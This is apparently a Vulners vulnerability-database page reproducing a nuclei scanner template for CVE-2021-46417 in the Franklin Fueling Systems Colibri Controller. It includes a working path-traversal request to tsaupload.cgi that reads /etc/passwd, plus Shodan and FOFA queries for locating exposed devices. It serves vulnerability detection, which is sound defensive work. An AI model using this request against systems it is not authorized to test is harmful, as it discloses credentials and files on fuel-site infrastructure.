Lucene search
K

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion

šŸ—“ļøĀ 05 Jul 2026Ā 03:01:21Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 24Ā Views

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 local file inclusion vulnerabilit

Related
Refs
Code
id: CVE-2021-46417

info:
  name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
  author: For3stCo1d
  severity: high
  description: |
    Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability.
  reference:
    - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
    - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
    - http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46417
    - https://github.com/KayCHENvip/vulnerability-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46417
    cwe-id: CWE-22
    epss-score: 0.59753
    epss-percentile: 0.99016
    cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: franklinfueling
    product: colibri_firmware
    shodan-query:
      - http.html:"Franklin Fueling Systems"
      - http.html:"franklin fueling systems"
    fofa-query: body="franklin fueling systems"
  tags: cve2021,cve,packetstorm,franklinfueling,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100b0f700436a1a15dac141b876940400f3b61da1b9f41ed475e724332824124e46022100a29f87597939469f1e0482a80d38f5d11a7e8550c4ef08d8ec60b5d3c7420b1b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.17.5
CVSS 27.8
EPSS0.59753
24